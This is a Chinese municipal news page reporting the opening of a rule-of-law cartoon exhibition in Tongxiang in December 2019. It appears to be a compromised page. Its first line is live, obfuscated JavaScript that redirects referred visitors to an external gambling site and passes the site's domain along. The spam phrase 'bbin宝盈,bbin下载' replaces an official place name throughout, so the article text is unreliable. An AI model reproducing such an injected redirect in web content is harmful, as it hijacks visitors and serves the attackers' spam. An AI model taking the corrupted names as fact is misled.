var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}
首页> 滚动图片

首届浙江?桐乡法治漫画大展在桐乡开幕

发布日期:2019-12-18 浏览次数: 字号:[ ]

B76A5307.jpg

12月17日上午,首届浙江?桐乡法治漫画大展在桐乡市文化馆隆重开幕,开幕式上宣读了本次法治漫画大展的获奖名单,为获奖代表颁奖。中国美术家协会漫画艺术委员会主任陈黎青,浙江省漫画家协会主席陶小明,bbin宝盈,bbin下载:司法局局长周梅芳,bbin宝盈,bbin下载:司法局副局长陈建新,bbin宝盈,bbin下载:文化广电旅游局副局长钱永忠,桐乡市委常委、宣传部部长潘敏芳等出席开幕式。  

首届浙江?桐乡法治漫画大展由浙江省司法厅、浙江省文化和旅游厅指导,中国美术家协会漫画艺术委员会、bbin宝盈,bbin下载:司法局、bbin宝盈,bbin下载:文化广电旅游局共同主办,浙江省漫画家协会、桐乡市司法局、桐乡市文化和广电旅游体育局、桐乡市文学艺术界联合会具体承办,桐乡市漫画家协会、子恺画院协办。自征稿以来共收到来自全国各地漫画家创作的作品1000余幅,通过中国美协漫画艺委会专家的评选,最终评出入选作品70件,其中《贼喊捉贼》《常在河边走、千万别湿鞋》等30件作品被评为优秀获奖作品。  

作为全国“七五”普法中期先进市,bbin宝盈,bbin下载:一直重视法治文化建设,将其作为推动法治嘉兴建设的重要内容。此前,由bbin宝盈,bbin下载:司法局推荐,桐乡市司法局制作的“我与宪法”微视频在第三届“我与宪法”微视频征集活动中荣获一等奖。本次法治漫画大展的部分优秀作品,也被列入浙江展览馆“浙里”光影颂宪法主题图片展,同时在杭州地铁1号线宪法主题车厢内进行展示。

桐乡市局

 




Produced By 大汉网络 大汉版通发布系统